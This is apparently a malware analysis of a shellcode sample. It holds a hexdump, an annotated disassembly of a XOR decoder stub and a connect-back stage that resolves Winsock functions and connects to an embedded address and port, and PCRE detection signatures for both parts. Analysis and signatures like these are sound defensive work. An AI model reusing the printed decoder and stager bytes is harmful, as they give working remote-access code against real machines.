000007b0: 00 00 31 c0 8b 83 a3 01 - 00 00 c1 e0 02 8b 8b 9b ..1..... ........ 000007c0: 01 00 00 01 c1 8b 01 03 - 83 8f 01 00 00 57 56 51 ........ .....WVQ 000007d0: 89 fe 89 c7 8b 8b a7 01 - 00 00 f3 a6 59 5e 5f 75 ........ ....Y..u 000007e0: bc 31 c0 8b 83 a3 01 00 - 00 d1 e0 8b 8b 9f 01 00 .1...... ........ 000007f0: 00 01 c1 31 c0 66 8b 01 - c1 e0 02 8b 8b 97 01 00 ...1.f.. ........ 00000800: 00 01 c8 8b 08 03 8b 8f - 01 00 00 89 c8 c3 31 c0 ........ ......1. 00000810: c3 e9 c8 02 00 00 3e 8b - 40 34 3e 8b a8 b8 00 00 ........ .4...... 00000820: 00 e9 0e 00 00 00 50 51 - 56 55 64 a1 30 00 00 00 ......PQ VUd.0... 00000830: 85 c0 78 e2 3e 8b 40 0c - 3e 8b 70 1c ad 3e 8b 68 ..x..... ..p....h 00000840: 08 89 ab 8f 01 00 00 89 - e8 66 81 38 4d 5a 75 c1 ........ .f.8MZu. 00000850: 05 3c 00 00 00 8b 08 03 - 8b 8f 01 00 00 66 81 39 ........ .....f.9 00000860: 50 45 75 ad 81 c1 78 00 - 00 00 8b 31 03 b3 8f 01 PEu...x. ...1.... 00000870: 00 00 81 c6 18 00 00 00 - ad 89 83 93 01 00 00 ad ........ ........ 00000880: 03 83 8f 01 00 00 89 83 - 97 01 00 00 ad 03 83 8f ........ ........ 00000890: 01 00 00 89 83 9b 01 00 - 00 ad 03 83 8f 01 00 00 ........ ........ 000008a0: 89 83 9f 01 00 00 5d 5e - 59 58 c3 50 b8 00 04 00 ........ YX.P.... 000008b0: 00 e8 71 01 00 00 3d 00 - 00 00 00 0f 84 ea ff ff ..q..... ........ 000008c0: ff 89 83 83 01 00 00 58 - 8b 93 83 01 00 00 52 68 .......X ......Rh 000008d0: 01 01 00 00 3e ff 53 41 - 3d 00 00 00 00 0f 85 e5 ......SA ........ 000008e0: ff ff ff 68 06 00 00 00 - 68 01 00 00 00 68 02 00 ...h.... h....h.. 000008f0: 00 00 3e ff 53 45 3d ff - ff ff ff 0f 84 e2 ff ff ....SE.. ........ 00000900: ff 89 83 f8 00 00 00 57 - 50 53 8d 93 7f 01 00 00 .......W PS...... 00000910: c6 02 16 52 8d 93 fc 00 - 00 00 66 c7 02 02 00 66 ...R.... ..f....f 00000920: 8b 7b 08 66 89 7a 02 8b - 7b 04 89 7a 04 52 8b 83 ...f.z.. ...z.R.. 00000930: f8 00 00 00 50 3e ff 53 - 49 3d 00 00 00 00 0f 8c ....P..S I....... 
00000940: c6 ff ff ff 5b 58 5f 50 - b8 00 10 00 00 e8 d5 00 .....X.P ........ 00000950: 00 00 3d 00 00 00 00 0f - 84 ea ff ff ff 89 83 60 ........ ........ 00000960: 01 00 00 58 e8 39 00 00 - 00 e8 d8 00 00 00 e8 57 ...X.9.. .......W 00000970: 00 00 00 e8 1f 01 00 00 - c3 8b 83 f8 00 00 00 50 ........ .......P 00000980: 3e ff 53 55 8b 83 ab 01 - 00 00 40 89 83 ab 01 00 ..SU.... ........ 00000990: 00 3d 05 00 00 00 0f 84 - 05 00 00 00 e9 42 ff ff ........ .....B.. 000009a0: ff c3 68 00 00 00 00 68 - 04 00 00 00 8d 93 87 01 ..h....h ........ 000009b0: 00 00 52 8b 93 f8 00 00 - 00 52 3e ff 53 4d 3d 01 ..R..... .R..SM.. 000009c0: 00 00 00 0f 8c b0 ff ff - ff c3 57 56 8b bb 87 01 ........ ..WV.... 000009d0: 00 00 8b b3 8b 01 00 00 - 39 f7 5e 5f 0f 84 32 00 ........ 9.....2. 000009e0: 00 00 68 00 00 00 00 68 - 00 10 00 00 8b 93 60 01 ..h....h ........ 000009f0: 00 00 52 8b 93 f8 00 00 - 00 52 3e ff 53 4d 3d 01 ..R..... .R..SM.. 00000a00: 00 00 00 0f 8c 70 ff ff - ff 01 83 8b 01 00 00 e9 .....p.. ........ 00000a10: 50 00 00 00 e8 6e 00 00 - 00 50 8b 83 f8 00 00 00 P....n.. .P...... 00000a20: 50 3e ff 53 55 58 c3 89 - c7 50 3e ff 93 97 00 00 P..SUX.. .P...... 00000a30: 00 5f 50 57 68 00 00 00 - 00 50 3e ff 93 93 00 00 ..PWh... .P...... 00000a40: 00 5f 5f 5f 58 c3 8d 93 - 64 01 00 00 52 8d 93 6c ....X... d...R..l 00000a50: 01 00 00 52 3e ff 93 87 - 00 00 00 5f 5f 89 83 68 ...R.... .......h 00000a60: 01 00 00 c3 ff b3 68 01 - 00 00 50 68 01 00 00 00 ......h. ..Ph.... 00000a70: 8b 93 60 01 00 00 52 3e - ff 93 8f 00 00 00 5f 5f ......R. ........ 00000a80: 5f 5f e9 43 ff ff ff 8b - 93 68 01 00 00 52 3e ff ...C.... .h...R.. 00000a90: 93 8b 00 00 00 5f c3 50 - 8d 83 0c 01 00 00 50 8d .......P ......P. 00000aa0: 83 1c 01 00 00 50 68 00 - 00 00 00 68 00 00 00 00 .....Ph. ...h.... 00000ab0: 68 28 00 00 00 68 00 00 - 00 00 68 00 00 00 00 68 h....h.. ..h....h 00000ac0: 00 00 00 00 8d 83 6c 01 - 00 00 50 68 00 00 00 00 ......l. ..Ph.... 
00000ad0: 3e ff 93 ec 00 00 00 58 - c3 e8 a9 ff ff ff 68 00 .......X ......h. 00000ae0: 00 00 00 ff 93 e8 00 00 - 00 90 00 00 5c 00 43 00 ........ ......C. 00000af0: 24 00 5c 00 31 00 32 00 - 33 00 34 00 35 00 36 00 ....1.2. 3.4.5.6. 00000b00: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 31 00 1.1.1.1. 1.1.1.1. 00000b10: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 2e 00 1.1.1.1. 1.1.1... 00000b20: 64 00 6f 00 63 00 00 00 - 01 10 08 00 cc cc cc cc d.o.c... ........ 00000b30: 20 00 00 00 30 00 2d 00 - 00 00 00 00 88 2a 0c 00 ....0... ........ 00000b40: 02 00 00 00 01 00 00 00 - 28 8c 0c 00 01 00 00 00 ........ ........ 00000b50: 07 00 00 00 00 00 00 00 - 00 ........ .
; Decoder stub of halle.bin as shown in the debugger (one instruction per line).
; It finds its own address with a jmp/call/pop sequence, then XORs the 0x686
; bytes that follow it, in place, with the single-byte key 0xD4.
; In the raw hexdump of the file the stub starts at offset 0x44E (EB 02 EB 05 ...),
; directly after the run of 0x90 bytes; the encoded body starts at offset 0x465.
; Analyst note: because the key is a single fixed byte, zero bytes of the body
; appear as runs of D4 in the raw file, and the import-name strings are only
; readable after XOR 0xD4. The 0x90 run followed by
; EB 02 EB 05 E8 F9 FF FF FF 5B 31 C9 66 B9 .. .. 80 73 0E .. 43 E2 F9
; is the unencoded part of the sample and therefore the part a byte signature can match.
00424A46 90 NOP ; last byte of the 0x90 run preceding the stub
00424A47 EB 02 JMP SHORT halle.00424A4B ; step over the next JMP to reach the CALL
00424A49 EB 05 JMP SHORT halle.00424A50 ; target of the CALL below; continues at POP EBX
00424A4B E8 F9FFFFFF CALL halle.00424A49 ; backward call: pushes return address 00424A50
00424A50 5B POP EBX ; EBX = 00424A50, the stub's own run-time address
00424A51 31C9 XOR ECX,ECX ; clear the loop counter
00424A53 66:B9 8606 MOV CX,686 ; xor len: 0x686 (1670) bytes to decode
00424A57 8073 0E D4 XOR BYTE PTR DS:[EBX+E],0D4 ; first pass hits EBX+0xE = 00424A5E, the byte right after LOOPD; key 0xD4
00424A5B 43 INC EBX ; advance to the next encoded byte
00424A5C ^E2 F9 LOOPD SHORT halle.00424A57 ; decrement ECX and repeat until it reaches zero
00424A5E E9 5F010000 JMP halle.00424BC2 ; first decoded instruction (raw file holds 3D 8B D5 D4 D4 here), so this listing shows memory after the loop has run
00424BAD 8983 9B000000 MOV DWORD PTR DS:[EBX+9B],EAX 00424BB3 53 PUSH EBX 00424BB4 E8 EB020000 CALL halle.00424EA4 00424BB9 5B POP EBX 00424BBA 58 POP EAX 00424BBB 5F POP EDI 00424BBC 5E POP ESI 00424BBD E8 10050000 CALL halle.004250D2 00424BC2 E8 9CFEFFFF CALL halle.00424A63 00424BC7 0000 ADD BYTE PTR DS:[EAX],AL ; 46 E4 24 76 is ip && 2E 1D is port 00424BC9 0000 ADD BYTE PTR DS:[EAX],AL 00424BCB 46 INC ESI 00424BCC E4 24 IN AL,24 ; I/O command 00424BCE 76 2E JBE SHORT halle.00424BFE 00424BD0 1D 7773325F SBB EAX,5F327377 00424BD5 3332 XOR ESI,DWORD PTR DS:[EDX] 00424BD7 0057 53 ADD BYTE PTR DS:[EDI+53],DL 00424BDA 41 INC ECX 00424BDB 53 PUSH EBX 00424BDC 74 61 JE SHORT halle.00424C3F 00424BDE 72 74 JB SHORT halle.00424C54 00424BE0 75 70 JNZ SHORT halle.00424C52 00424BE2 0073 6F ADD BYTE PTR DS:[EBX+6F],DH 00424BE5 636B 65 ARPL WORD PTR DS:[EBX+65],BP 00424BE8 74 00 JE SHORT halle.00424BEA 00424BEA 636F 6E ARPL WORD PTR DS:[EDI+6E],BP 00424BED 6E OUTS DX,BYTE PTR ES:[EDI] ; I/O command 00424BEE 65:637400 72 ARPL WORD PTR GS:[EAX+EAX+72],SI 00424BF3 65:6376 00 ARPL WORD PTR GS:[ESI],SI 00424BF7 73 65 JNB SHORT halle.00424C5E 00424BF9 6E OUTS DX,BYTE PTR ES:[EDI] ; I/O command 00424BFA 64:0063 6C ADD BYTE PTR FS:[EBX+6C],AH 00424BFE 6F OUTS DX,DWORD PTR ES:[EDI] ; I/O command 00424BFF 73 65 JNB SHORT halle.00424C66 00424C01 73 6F JNB SHORT halle.00424C72 00424C03 636B 65 ARPL WORD PTR DS:[EBX+65],BP 00424C06 74 00 JE SHORT halle.00424C08 00424C08 F5 CMC 00424C09 D7 XLAT BYTE PTR DS:[EBX+AL] 00424C0A FA CLI 00424C0B 74 3D JE SHORT halle.00424C4A 00424C0D 35 FA74B9C1 XOR EAX,C1B974FA 00424C12 FA CLI 00424C13 74 01 JE SHORT halle.00424C16 00424C15 A1 FA74CC1B MOV EAX,DWORD PTR DS:[1BCC74FA] 00424C1A FA CLI 00424C1B 74 5E JE SHORT halle.00424C7B 00424C1D 14 FA ADC AL,0FA 00424C1F 74 6D JE SHORT halle.00424C8E 00424C21 73 76 JNB SHORT halle.00424C99 00424C23 6372 74 ARPL WORD PTR DS:[EDX+74],SI 00424C26 0066 6F ADD BYTE PTR DS:[ESI+6F],AH 00424C29 70 65 JO SHORT 
halle.00424C90 00424C2B 6E OUTS DX,BYTE PTR ES:[EDI] ; I/O command 00424C2C 0066 63 ADD BYTE PTR DS:[ESI+63],AH 00424C2F 6C INS BYTE PTR ES:[EDI],DX ; I/O command 00424C30 6F OUTS DX,DWORD PTR ES:[EDI] ; I/O command 00424C31 73 65 JNB SHORT halle.00424C98 00424C33 0066 77 ADD BYTE PTR DS:[ESI+77],AH 00424C36 72 69 JB SHORT halle.00424CA1 00424C38 74 65 JE SHORT halle.00424C9F 00424C3A 006D 65 ADD BYTE PTR SS:[EBP+65],CH 00424C3D 6D INS DWORD PTR ES:[EDI],DX ; I/O command 00424C3E 73 65 JNB SHORT halle.00424CA5 00424C40 74 00 JE SHORT halle.00424C42 00424C42 6D INS DWORD PTR ES:[EDI],DX ; I/O command 00424C43 61 POPAD 00424C44 6C INS BYTE PTR ES:[EDI],DX ; I/O command 00424C45 6C INS BYTE PTR ES:[EDI],DX ; I/O command 00424C46 6F OUTS DX,DWORD PTR ES:[EDI] ; I/O command 00424C47 6300 ARPL WORD PTR DS:[EAX],AX 00424C49 -66:72 65 JB SHORT 00004CB1 00424C4C 65:00AB 0F02789F ADD BYTE PTR GS:[EBX+9F78020F],CH 00424C53 FD STD 00424C54 0078 A6 ADD BYTE PTR DS:[EAX-5A],BH 00424C57 34 02 XOR AL,2 00424C59 78 1D JS SHORT halle.00424C78 00424C5B 1A00 SBB AL,BYTE PTR DS:[EAX] 00424C5D ^78 A9 JS SHORT halle.00424C08 00424C5F 14 00 ADC AL,0 00424C61 ^78 B0 JS SHORT halle.00424C13 00424C63 1D 00786B65 SBB EAX,656B7800 00424C68 72 6E JB SHORT halle.00424CD8 00424C6A 65:6C INS BYTE PTR ES:[EDI],DX ; I/O command 00424C6C 3332 XOR ESI,DWORD PTR DS:[EDX] 00424C6E 0047 65 ADD BYTE PTR DS:[EDI+65],AL 00424C71 74 50 JE SHORT halle.00424CC3 00424C73 72 6F JB SHORT halle.00424CE4 00424C75 6341 64 ARPL WORD PTR DS:[ECX+64],AX 00424C78 64:72 65 JB SHORT halle.00424CE0 ; Superfluous prefix 00424C7B 73 73 JNB SHORT halle.00424CF0 00424C7D 004C6F 61 ADD BYTE PTR DS:[EDI+EBP*2+61],CL 00424C81 64:4C DEC ESP ; Superfluous prefix 00424C83 6962 72 61727941 IMUL ESP,DWORD PTR DS:[EDX+72],41797261 00424C8A 0053 6C ADD BYTE PTR DS:[EBX+6C],DL 00424C8D 65: PREFIX GS: ; Superfluous prefix 00424C8E 65:70 00 JO SHORT halle.00424C91 ; Superfluous prefix 00424C91 45 INC EBP 00424C92 78 69 JS SHORT 
halle.00424CFD 00424C94 74 54 JE SHORT halle.00424CEA 00424C96 68 72656164 PUSH 64616572 00424C9B 0043 72 ADD BYTE PTR DS:[EBX+72],AL 00424C9E 65:61 POPAD ; Superfluous prefix 00424CA0 74 65 JE SHORT halle.00424D07 00424CA2 50 PUSH EAX 00424CA3 72 6F JB SHORT halle.00424D14 00424CA5 6365 73 ARPL WORD PTR SS:[EBP+73],SP 00424CA8 73 41 JNB SHORT halle.00424CEB 00424CAA 0003 ADD BYTE PTR DS:[EBX],AL 00424CAC A2 E9779DB9 MOV BYTE PTR DS:[B99D77E9],AL 00424CB1 -E9 77A84FE9 JMP E991F52D 00424CB6 ^77 D5 JA SHORT halle.00424C8D 00424CB8 01E9 ADD ECX,EBP 00424CBA 77 5F JA SHORT halle.00424D1B 00424CBC 0C E9 OR AL,0E9 00424CBE 77 60 JA SHORT halle.00424D20 00424CC0 0000 ADD BYTE PTR DS:[EAX],AL 00424CC2 0002 ADD BYTE PTR DS:[EDX],AL 00424CC4 002E ADD BYTE PTR DS:[ESI],CH 00424CC6 1D 46E42476 SBB EAX,7624E446 00424CCB 0000 ADD BYTE PTR DS:[EAX],AL 00424CCD 0000 ADD BYTE PTR DS:[EAX],AL 00424CCF 0000 ADD BYTE PTR DS:[EAX],AL 00424CD1 0000 ADD BYTE PTR DS:[EAX],AL 00424CD3 0000 ADD BYTE PTR DS:[EAX],AL 00424CD5 0000 ADD BYTE PTR DS:[EAX],AL 00424CD7 0000 ADD BYTE PTR DS:[EAX],AL 00424CD9 0000 ADD BYTE PTR DS:[EAX],AL 00424CDB 0000 ADD BYTE PTR DS:[EAX],AL 00424CDD 0000 ADD BYTE PTR DS:[EAX],AL 00424CDF 0000 ADD BYTE PTR DS:[EAX],AL 00424CE1 0000 ADD BYTE PTR DS:[EAX],AL 00424CE3 44 INC ESP 00424CE4 0000 ADD BYTE PTR DS:[EAX],AL 00424CE6 0000 ADD BYTE PTR DS:[EAX],AL 00424CE8 0000 ADD BYTE PTR DS:[EAX],AL 00424CEA 0000 ADD BYTE PTR DS:[EAX],AL 00424CEC 0000 ADD BYTE PTR DS:[EAX],AL 00424CEE 0000 ADD BYTE PTR DS:[EAX],AL 00424CF0 0000 ADD BYTE PTR DS:[EAX],AL 00424CF2 0000 ADD BYTE PTR DS:[EAX],AL 00424CF4 0000 ADD BYTE PTR DS:[EAX],AL 00424CF6 0000 ADD BYTE PTR DS:[EAX],AL 00424CF8 0000 ADD BYTE PTR DS:[EAX],AL 00424CFA 0000 ADD BYTE PTR DS:[EAX],AL 00424CFC 0000 ADD BYTE PTR DS:[EAX],AL 00424CFE 0000 ADD BYTE PTR DS:[EAX],AL 00424D00 0000 ADD BYTE PTR DS:[EAX],AL 00424D02 0000 ADD BYTE PTR DS:[EAX],AL 00424D04 0000 ADD BYTE PTR DS:[EAX],AL 00424D06 0000 ADD BYTE PTR DS:[EAX],AL 
00424D08 0000 ADD BYTE PTR DS:[EAX],AL 00424D0A 0000 ADD BYTE PTR DS:[EAX],AL 00424D0C 0000 ADD BYTE PTR DS:[EAX],AL 00424D0E 0000 ADD BYTE PTR DS:[EAX],AL 00424D10 0000 ADD BYTE PTR DS:[EAX],AL 00424D12 0000 ADD BYTE PTR DS:[EAX],AL 00424D14 0000 ADD BYTE PTR DS:[EAX],AL 00424D16 0000 ADD BYTE PTR DS:[EAX],AL 00424D18 0000 ADD BYTE PTR DS:[EAX],AL 00424D1A 0000 ADD BYTE PTR DS:[EAX],AL 00424D1C 0000 ADD BYTE PTR DS:[EAX],AL 00424D1E 0000 ADD BYTE PTR DS:[EAX],AL 00424D20 0000 ADD BYTE PTR DS:[EAX],AL 00424D22 0000 ADD BYTE PTR DS:[EAX],AL 00424D24 0000 ADD BYTE PTR DS:[EAX],AL 00424D26 0000 ADD BYTE PTR DS:[EAX],AL 00424D28 0000 ADD BYTE PTR DS:[EAX],AL 00424D2A 0077 2B ADD BYTE PTR DS:[EDI+2B],DH 00424D2D 6200 BOUND EAX,QWORD PTR DS:[EAX] 00424D2F 0000 ADD BYTE PTR DS:[EAX],AL 00424D31 0000 ADD BYTE PTR DS:[EAX],AL 00424D33 77 69 JA SHORT halle.00424D9E 00424D35 6E OUTS DX,BYTE PTR ES:[EDI] ; I/O command 00424D36 68 6C707033 PUSH 3370706C 00424D3B 322E XOR CH,BYTE PTR DS:[ESI] 00424D3D 65:78 65 JS SHORT halle.00424DA5 ; Superfluous prefix 00424D40 006F 70 ADD BYTE PTR DS:[EDI+70],CH 00424D43 65:6E OUTS DX,BYTE PTR ES:[EDI] ; I/O command 00424D45 0016 ADD BYTE PTR DS:[ESI],DL 00424D47 0000 ADD BYTE PTR DS:[EAX],AL 00424D49 0068 24 ADD BYTE PTR DS:[EAX+24],CH 00424D4C 2F DAS 00424D4D 0000 ADD BYTE PTR DS:[EAX],AL 00424D4F 0000 ADD BYTE PTR DS:[EAX],AL 00424D51 0000 ADD BYTE PTR DS:[EAX],AL 00424D53 0000 ADD BYTE PTR DS:[EAX],AL 00424D55 0000 ADD BYTE PTR DS:[EAX],AL 00424D57 00E7 ADD BH,AH 00424D59 77 3D JA SHORT halle.00424D98 00424D5B 0300 ADD EAX,DWORD PTR DS:[EAX] 00424D5D 0048 42 ADD BYTE PTR DS:[EAX+42],CL 00424D60 EC IN AL,DX ; I/O command 00424D61 77 3C JA SHORT halle.00424D9F 00424D63 4F DEC EDI 00424D64 EC IN AL,DX ; I/O command 00424D65 77 30 JA SHORT halle.00424D97 00424D67 5C POP ESP 00424D68 EC IN AL,DX ; I/O command 00424D69 ^77 E5 JA SHORT halle.00424D50 00424D6B 0100 ADD DWORD PTR DS:[EAX],EAX 00424D6D 000D 00000000 ADD BYTE PTR DS:[0],CL 00424D73 
0000 ADD BYTE PTR DS:[EAX],AL 00424D75 0051 57 ADD BYTE PTR DS:[ECX+57],DL 00424D78 56 PUSH ESI 00424D79 56 PUSH ESI 00424D7A FF93 F0000000 CALL DWORD PTR DS:[EBX+F0] 00424D80 50 PUSH EAX 00424D81 59 POP ECX 00424D82 57 PUSH EDI 00424D83 51 PUSH ECX 00424D84 FF93 F4000000 CALL DWORD PTR DS:[EBX+F4] 00424D8A 5E POP ESI 00424D8B 5F POP EDI 00424D8C 59 POP ECX 00424D8D C3 RETN 00424D8E 31C0 XOR EAX,EAX 00424D90 8983 A3010000 MOV DWORD PTR DS:[EBX+1A3],EAX 00424D96 8B93 A3010000 MOV EDX,DWORD PTR DS:[EBX+1A3] 00424D9C 3B93 93010000 CMP EDX,DWORD PTR DS:[EBX+193] 00424DA2 7D 63 JGE SHORT halle.00424E07 00424DA4 42 INC EDX 00424DA5 8993 A3010000 MOV DWORD PTR DS:[EBX+1A3],EDX 00424DAB 31C0 XOR EAX,EAX 00424DAD 8B83 A3010000 MOV EAX,DWORD PTR DS:[EBX+1A3] 00424DB3 C1E0 02 SHL EAX,2 00424DB6 8B8B 9B010000 MOV ECX,DWORD PTR DS:[EBX+19B] 00424DBC 01C1 ADD ECX,EAX 00424DBE 8B01 MOV EAX,DWORD PTR DS:[ECX] 00424DC0 0383 8F010000 ADD EAX,DWORD PTR DS:[EBX+18F] 00424DC6 57 PUSH EDI 00424DC7 56 PUSH ESI 00424DC8 51 PUSH ECX 00424DC9 89FE MOV ESI,EDI 00424DCB 89C7 MOV EDI,EAX 00424DCD 8B8B A7010000 MOV ECX,DWORD PTR DS:[EBX+1A7] 00424DD3 F3:A6 REPE CMPS BYTE PTR ES:[EDI],BYTE PTR DS:> 00424DD5 59 POP ECX 00424DD6 5E POP ESI 00424DD7 5F POP EDI 00424DD8 ^75 BC JNZ SHORT halle.00424D96 00424DDA 31C0 XOR EAX,EAX 00424DDC 8B83 A3010000 MOV EAX,DWORD PTR DS:[EBX+1A3] 00424DE2 D1E0 SHL EAX,1 00424DE4 8B8B 9F010000 MOV ECX,DWORD PTR DS:[EBX+19F] 00424DEA 01C1 ADD ECX,EAX 00424DEC 31C0 XOR EAX,EAX 00424DEE 66:8B01 MOV AX,WORD PTR DS:[ECX] 00424DF1 C1E0 02 SHL EAX,2 00424DF4 8B8B 97010000 MOV ECX,DWORD PTR DS:[EBX+197] 00424DFA 01C8 ADD EAX,ECX 00424DFC 8B08 MOV ECX,DWORD PTR DS:[EAX] 00424DFE 038B 8F010000 ADD ECX,DWORD PTR DS:[EBX+18F] 00424E04 89C8 MOV EAX,ECX 00424E06 C3 RETN 00424E07 31C0 XOR EAX,EAX 00424E09 C3 RETN 00424E0A E9 C8020000 JMP halle.004250D7 00424E0F 3E:8B40 34 MOV EAX,DWORD PTR DS:[EAX+34] 00424E13 3E:8BA8 B8000000 MOV EBP,DWORD PTR DS:[EAX+B8] 00424E1A E9 0E000000 JMP 
halle.00424E2D 00424E1F 50 PUSH EAX 00424E20 51 PUSH ECX 00424E21 56 PUSH ESI 00424E22 55 PUSH EBP 00424E23 64:A1 30000000 MOV EAX,DWORD PTR FS:[30] 00424E29 85C0 TEST EAX,EAX 00424E2B ^78 E2 JS SHORT halle.00424E0F 00424E2D 3E:8B40 0C MOV EAX,DWORD PTR DS:[EAX+C] 00424E31 3E:8B70 1C MOV ESI,DWORD PTR DS:[EAX+1C] 00424E35 AD LODS DWORD PTR DS:[ESI] 00424E36 3E:8B68 08 MOV EBP,DWORD PTR DS:[EAX+8] 00424E3A 89AB 8F010000 MOV DWORD PTR DS:[EBX+18F],EBP 00424E40 89E8 MOV EAX,EBP 00424E42 66:8138 4D5A CMP WORD PTR DS:[EAX],5A4D 00424E47 ^75 C1 JNZ SHORT halle.00424E0A 00424E49 05 3C000000 ADD EAX,3C 00424E4E 8B08 MOV ECX,DWORD PTR DS:[EAX] 00424E50 038B 8F010000 ADD ECX,DWORD PTR DS:[EBX+18F] 00424E56 66:8139 5045 CMP WORD PTR DS:[ECX],4550 00424E5B ^75 AD JNZ SHORT halle.00424E0A 00424E5D 81C1 78000000 ADD ECX,78 00424E63 8B31 MOV ESI,DWORD PTR DS:[ECX] 00424E65 03B3 8F010000 ADD ESI,DWORD PTR DS:[EBX+18F] 00424E6B 81C6 18000000 ADD ESI,18 00424E71 AD LODS DWORD PTR DS:[ESI] 00424E72 8983 93010000 MOV DWORD PTR DS:[EBX+193],EAX 00424E78 AD LODS DWORD PTR DS:[ESI] 00424E79 0383 8F010000 ADD EAX,DWORD PTR DS:[EBX+18F] 00424E7F 8983 97010000 MOV DWORD PTR DS:[EBX+197],EAX 00424E85 AD LODS DWORD PTR DS:[ESI] 00424E86 0383 8F010000 ADD EAX,DWORD PTR DS:[EBX+18F] 00424E8C 8983 9B010000 MOV DWORD PTR DS:[EBX+19B],EAX 00424E92 AD LODS DWORD PTR DS:[ESI] 00424E93 0383 8F010000 ADD EAX,DWORD PTR DS:[EBX+18F] 00424E99 8983 9F010000 MOV DWORD PTR DS:[EBX+19F],EAX 00424E9F 5D POP EBP 00424EA0 5E POP ESI 00424EA1 59 POP ECX 00424EA2 58 POP EAX 00424EA3 C3 RETN 00424EA4 50 PUSH EAX 00424EA5 B8 00040000 MOV EAX,400 00424EAA E8 71010000 CALL halle.00425020 00424EAF 3D 00000000 CMP EAX,0 00424EB4 ^0F84 EAFFFFFF JE halle.00424EA4 00424EBA 8983 83010000 MOV DWORD PTR DS:[EBX+183],EAX 00424EC0 58 POP EAX 00424EC1 8B93 83010000 MOV EDX,DWORD PTR DS:[EBX+183] 00424EC7 52 PUSH EDX 00424EC8 68 01010000 PUSH 101 00424ECD 3E:FF53 41 CALL DWORD PTR DS:[EBX+41] ; WSAStartup 00424ED1 3D 00000000 
CMP EAX,0 ; after WSAStartup 00424ED6 ^0F85 E5FFFFFF JNZ halle.00424EC1 00424EDC 68 06000000 PUSH 6 00424EE1 68 01000000 PUSH 1 00424EE6 68 02000000 PUSH 2 00424EEB 3E:FF53 45 CALL DWORD PTR DS:[EBX+45] ; socket() 00424EEF 3D FFFFFFFF CMP EAX,-1 ; after socket 00424EF4 ^0F84 E2FFFFFF JE halle.00424EDC 00424EFA 8983 F8000000 MOV DWORD PTR DS:[EBX+F8],EAX 00424F00 57 PUSH EDI 00424F01 50 PUSH EAX 00424F02 53 PUSH EBX 00424F03 8D93 7F010000 LEA EDX,DWORD PTR DS:[EBX+17F] 00424F09 C602 16 MOV BYTE PTR DS:[EDX],16 00424F0C 52 PUSH EDX 00424F0D 8D93 FC000000 LEA EDX,DWORD PTR DS:[EBX+FC] 00424F13 66:C702 0200 MOV WORD PTR DS:[EDX],2 00424F18 66:8B7B 08 MOV DI,WORD PTR DS:[EBX+8] 00424F1C 66:897A 02 MOV WORD PTR DS:[EDX+2],DI 00424F20 8B7B 04 MOV EDI,DWORD PTR DS:[EBX+4] 00424F23 897A 04 MOV DWORD PTR DS:[EDX+4],EDI 00424F26 52 PUSH EDX ; check stack to verify ip & port here 00424F27 8B83 F8000000 MOV EAX,DWORD PTR DS:[EBX+F8] 00424F2D 50 PUSH EAX 00424F2E 3E:FF53 49 CALL DWORD PTR DS:[EBX+49] ; connect() 00424F32 3D 00000000 CMP EAX,0 ; after connect() 00424F37 ^0F8C C6FFFFFF JL halle.00424F03 00424F3D 5B POP EBX 00424F3E 58 POP EAX 00424F3F 5F POP EDI 00424F40 50 PUSH EAX 00424F41 B8 00100000 MOV EAX,1000 00424F46 E8 D5000000 CALL halle.00425020 00424F4B 3D 00000000 CMP EAX,0
/*
 * PCRE signature for the XOR decoder stub, written one x86 instruction per
 * literal (adjacent literals concatenate to the same pattern text).
 *
 * Capture 1 is the 16-bit immediate loaded into CX (the loop count) and
 * capture 2 is the 8-bit immediate of the XOR (the key).
 *
 * The captures use '.', which does not match 0x0A unless the pattern is
 * compiled with PCRE_DOTALL. Without that flag, a sample whose count or key
 * contains 0x0A is not matched. The subject is binary, so it must be passed
 * to the matcher with an explicit length rather than as a C string.
 */
const char *pattern =
    "\\x90"                         /* nop                               */
    "\\xEB\\x02"                    /* jmp short +2                      */
    "\\xEB\\x05"                    /* jmp short +5                      */
    "\\xE8\\xF9\\xFF\\xFF\\xFF"     /* call -7  (pushes current address) */
    "\\x5B"                         /* pop ebx                           */
    "\\x31\\xC9"                    /* xor ecx, ecx                      */
    "\\x66\\xB9(..)"                /* mov cx, imm16     -> capture 1    */
    "\\x80\\x73\\x0E(.)"            /* xor byte [ebx+0x0e], imm8 -> capture 2 */
    "\\x43"                         /* inc ebx                           */
    "\\xE2\\xF9"                    /* loop -7                           */
    "\\xE9\\x5F\\x01\\x00\\x00";    /* jmp rel32                         */
/*
 * PCRE signature for the connect-back stage: a short run of code followed by
 * the stage's embedded data block (two captured fields, library and function
 * names, and a six-entry dword table). Written one field per literal;
 * adjacent literals concatenate to the same pattern text.
 *
 * Capture 1 is the 4 bytes and capture 2 the 2 bytes that follow the four
 * zero bytes. The disassembly on this page copies [EBX+4] into the address
 * field and [EBX+8] into the port field of the structure passed to
 * connect(), which lines up with these two positions if EBX points at the
 * zero dword. Presumably host then port, both in network byte order
 * (confirm against a capture).
 *
 * The captures use '.', which does not match 0x0A unless the pattern is
 * compiled with PCRE_DOTALL. Without that flag, a sample whose address or
 * port contains the byte 0x0A is not matched. The subject is binary, so it
 * must be passed to the matcher with an explicit length.
 */
const char *pattern =
    /* code immediately ahead of the data block */
    "\\x89\\x83\\x9B\\x00\\x00\\x00"    /* mov [ebx+0x9b], eax       */
    "\\x53"                             /* push ebx                  */
    "\\xE8\\xEB\\x02\\x00\\x00"         /* call rel32                */
    "\\x5B\\x58\\x5F\\x5E"              /* pop ebx, eax, edi, esi    */
    "\\xE8\\x10\\x05\\x00\\x00"         /* call rel32                */
    "\\xE8\\x9C\\xFE\\xFF\\xFF"         /* call rel32 (backwards)    */

    /* data block */
    "\\x00\\x00\\x00\\x00"
    "(....)"                            /* capture 1: 4 bytes        */
    "(..)"                              /* capture 2: 2 bytes        */
    "\\x77\\x73\\x32\\x5F\\x33\\x32\\x00"                           /* "ws2_32\0"      */
    "\\x57\\x53\\x41\\x53\\x74\\x61\\x72\\x74\\x75\\x70\\x00"       /* "WSAStartup\0"  */
    "\\x73\\x6F\\x63\\x6B\\x65\\x74\\x00"                           /* "socket\0"      */
    "\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x00"                      /* "connect\0"     */
    "\\x72\\x65\\x63\\x76\\x00"                                     /* "recv\0"        */
    "\\x73\\x65\\x6E\\x64\\x00"                                     /* "send\0"        */
